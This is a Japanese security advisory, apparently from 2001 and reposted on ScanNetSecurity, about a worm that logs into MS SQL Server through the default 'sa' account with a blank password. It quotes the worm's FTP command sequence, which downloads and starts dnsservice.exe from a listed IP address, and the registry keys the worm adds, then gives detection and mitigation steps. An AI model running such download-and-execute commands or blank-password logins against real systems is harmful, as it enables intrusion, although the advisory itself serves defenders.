マイクロソフトSQLサーバーを狙ったワームが蔓延中 | ScanNetSecurity[国内最大級のサイバーセキュリティ専門ポータルサイト]
2018.07.19(木)

マイクロソフトSQLサーバーを狙ったワームが蔓延中

国際 海外情報

概要:
 TCPポート1433を走査しているワームが蔓延中との報告がある。1433ポートはマイクロソフト社のSQL サーバーのポートとして使用される事が多い。1433ポートが開いている事をワームが確認すると、ワームはホストへの侵入をユーザー名sa、 パスワードはブランク(無し)で試みる。アプリケーションの多くがSQLサポートを使用している為、システム管理者が使用するIDとしてデフォルトが"sa"になっておりパスワードは設定されていない。

 ログオンに成功すると、ポート6669にあるbots.kujikiri.netのIRCサーバーに接続する。ワームがホストに到達すると、IRCチャンネルに"ホストが感染した"というメッセージを残す。次にIPアドレス207.29.192.160(フィラデルフィア美術館に関係したアドレス)にFTP接続し以下のコマンドを実行する。

ftp
foo.com
bin
cd pub
cd tmp
get dnsservice.exe
start dnsservice.exe
close
quit

 上記の"ftp"はFTPアクセスに使用されたユーザ−名で" foo.com "は パスワードとして使用されている。感染したホストにdnsservice.exeをダウンロードし実行する仕掛けになっている。現段階ではこの実行ファイルによる影響は分っていない。

 更にコンピュータが起動する度にプログラムが走るようにレジストリに以下の3つのキーが書き加えられる。

SOFTWAREMicrosoftWindowsCurrentVersionRunTaskReg
SOFTWAREMicrosoftMSSQLServerClientSuperSocketNetLibProtocolOrder
SOFTWAREMicrosoftMSSQLServerClientConnectToDSQUERY


情報ソース:
Neohapis Archives (MS SQL HACKING, ), Nov. 13, 2000
http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0094.html
incidents@securityfocus.com (Douglas P. Brown (dugbrown@email.unc.edu)), Nov. 20, 2001
BugTraq (Patrick Andry, pandry@wolverinefreight.ca), Nov. 20, 2001
BugTraq (Arthur Donkers, arthur@reseau.nl), Nov. 20, 2001
Incidents.org Oct. 04, 2001
http://www.incidents.org/diary/october01/100401.php#043
iDEFENSE Intelligence Operations, Nov. 20, 2001
iDEFENSE Labs, Nov. 20, 2001


分析:
 目的は不明だが、ワームは開いている1433TCPポートを走査している。このポートは通常、SQLサーバーを使用するProject 2000, Viso2000, Access 2000 及び Visual Studio 6.0が使用されている時に稼動する。

 SANS研究所によれば、最近、ポート1433の走査が盛んに行われたのは今年の10月上旬頃からとの報告がある。多くのスキャンは韓国発である事も確認されている。

 現時点ではアドレス207.29.192.160のFTPサーバー及び関連している実行ファイルの情報は入手出来ていないが、ワームの当バージョンは繁殖していない可能性もある。但し、将来、Ramenワームの様に新に感染したホストに自らのコピーをアップロード出来る亜種が発生する可能性もある。この様な亜種が発生すれば繁殖を抑える事は難しくなる。


検知方法:
 上記のレジストリがあれば感染している可能性がある。さらに Windows NT.4.0/2000では、システム管理者がMSSQLサーバーサービスが稼動していればコントロールパネルのサービスで確認する事ができる。IDS(侵入検知)で上記のテキスト文をftpセッション若しくはIRCとFTPに出て行くコネクションをモニターする事でワームを検知する事ができる。


暫定処置:
 コマンドプロンプトでnetstat -aのコマンドをかけて現在のポートの使用状況が確認できる。もし、TCP 1433ポートがあればSQLの機能と関連しているデフォルトのユーザ名、パスワードを変更する。また、TCP 1433ポートがインターネット接続に必要なポートでなければ、ルーター又はファイヤーウォールに当該ポートのingress/egressフィルタリング制限をかけると更に良い。


(詳しくはScan Daily EXpress本誌をご覧下さい)
http://vagabond.co.jp/vv/m-sdex.htm

※この情報はiDEFENSE社( http://www.idefense.co.jp/ )より提供いただいております。情報の内容は以下の時点におけるものです
【23:50 GMT、11、20、2001】

《ScanNetSecurity》

Scan PREMIUM 会員限定記事

もっと見る

Scan PREMIUM 会員限定記事特集をもっと見る

カテゴリ別新着記事

★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★
<b>★★Scan PREMIUM 会員限定コンテンツにフルアクセスが可能となります★★</b>

経営課題としてサイバーセキュリティに取り組む情報システム部門や、研究・開発・経営企画に携わる方へ向けた、創刊19年のセキュリティ情報サービス Scan PREMIUM を、貴社の事業リスク低減のためにご活用ください。

×